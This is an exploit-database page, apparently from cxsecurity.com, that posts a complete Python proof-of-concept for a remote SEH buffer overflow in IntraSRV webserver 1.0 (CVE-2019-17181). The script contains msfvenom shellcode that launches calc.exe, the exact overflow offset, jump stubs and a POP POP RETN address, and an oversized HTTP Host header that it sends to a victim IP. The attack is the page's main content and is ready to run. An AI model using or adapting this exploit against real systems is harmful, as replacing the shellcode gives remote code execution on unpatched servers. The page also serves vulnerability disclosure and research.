IntraSRV 1.0 remote SEH overflow

2019.10.27
us x00pwn (US) us
Risk: High
Local: No
Remote: Yes
CWE: CWE-120


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python # Exploit Title: IntraSRV webserver 1.0 SEH overflow writeup # Date: 10/10/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.leighb.com # Software Link: http://www.leighb.com/intrasrv.htm # Version: 1.0 # Tested on: Windows 7 # CVE : CVE-2019-17181 import socket from struct import * victim_host = "10.0.0.17" victim_port = 80 # msfvenom -p windows/exec CMD=calc.exe -b "\x00\xff\x0d\x0a" EXITFUNC=thread -f python -v shellcode_calc shellcode_calc = "" shellcode_calc += "\xba\x97\x92\x8c\xa9\xda\xd2\xd9\x74\x24" shellcode_calc += "\xf4\x5f\x2b\xc9\xb1\x31\x31\x57\x13\x83" shellcode_calc += "\xc7\x04\x03\x57\x98\x70\x79\x55\x4e\xf6" shellcode_calc += "\x82\xa6\x8e\x97\x0b\x43\xbf\x97\x68\x07" shellcode_calc += "\xef\x27\xfa\x45\x03\xc3\xae\x7d\x90\xa1" shellcode_calc += "\x66\x71\x11\x0f\x51\xbc\xa2\x3c\xa1\xdf" shellcode_calc += "\x20\x3f\xf6\x3f\x19\xf0\x0b\x41\x5e\xed" shellcode_calc += "\xe6\x13\x37\x79\x54\x84\x3c\x37\x65\x2f" shellcode_calc += "\x0e\xd9\xed\xcc\xc6\xd8\xdc\x42\x5d\x83" shellcode_calc += "\xfe\x65\xb2\xbf\xb6\x7d\xd7\xfa\x01\xf5" shellcode_calc += "\x23\x70\x90\xdf\x7a\x79\x3f\x1e\xb3\x88" shellcode_calc += "\x41\x66\x73\x73\x34\x9e\x80\x0e\x4f\x65" shellcode_calc += "\xfb\xd4\xda\x7e\x5b\x9e\x7d\x5b\x5a\x73" shellcode_calc += "\x1b\x28\x50\x38\x6f\x76\x74\xbf\xbc\x0c" shellcode_calc += "\x80\x34\x43\xc3\x01\x0e\x60\xc7\x4a\xd4" shellcode_calc += "\x09\x5e\x36\xbb\x36\x80\x99\x64\x93\xca" shellcode_calc += "\x37\x70\xae\x90\x5d\x87\x3c\xaf\x13\x87" shellcode_calc += "\x3e\xb0\x03\xe0\x0f\x3b\xcc\x77\x90\xee" shellcode_calc += "\xa9\x98\x72\x3b\xc7\x30\x2b\xae\x6a\x5d" shellcode_calc += "\xcc\x04\xa8\x58\x4f\xad\x50\x9f\x4f\xc4" shellcode_calc += "\x55\xdb\xd7\x34\x27\x74\xb2\x3a\x94\x75" shellcode_calc += "\x97\x58\x7b\xe6\x7b\xb1\x1e\x8e\x1e\xcd" # SEH handler overwritten with - 43336143 # [*] Exact match at offset 1569 # Log data, item 23 # Address=0BADF00D # Message = SEH record (nseh field) at 0x0018ff78 overwritten with normal pa$ nseh_stage1 = "\x90\x90\xEB\xF6" # JMP back 10 bytes jmp450_stage2 = "\x90\x90\x90\xE9\x3E\xFE\xFF\xFF" # Have it hit our long jump back 450 seh_handler = pack('<L', 0x004097dd) # our POP POP RETN from intrasrv.exe # 0x004097dd : pop eax # pop ebp # ret | startnull {PAGE_EXECUTE_READ} [intrasrv.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\john\Desktop\intrasrv.exe) exploit_payload = "A" * (1553 - len(shellcode_calc) - 8) + shellcode_calc exploit_payload += jmp450_stage2 exploit_payload += nseh_stage1 exploit_payload += seh_handler exploit_payload += "A" * (4000 - len(exploit_payload)) http_request = "HEAD / HTTP/1.1\r\n" http_request += "Host:" + exploit_payload + "\r\n" http_request += "User-Agent: firefox \r\n" http_request += "If-Modified-Since: Wed \r\n\r\n" expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) try: print("[*] Intrasrv webserver 1.0 SEH overflow POC\n") expl.connect((victim_host, victim_port)) print("[*] Establishing a connection to the vicitm") expl.send(http_request) print("[*] Sending the payload") expl.close() print("[*] Watch for a spawned calc") except: print("[!] Exploit failed to send")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top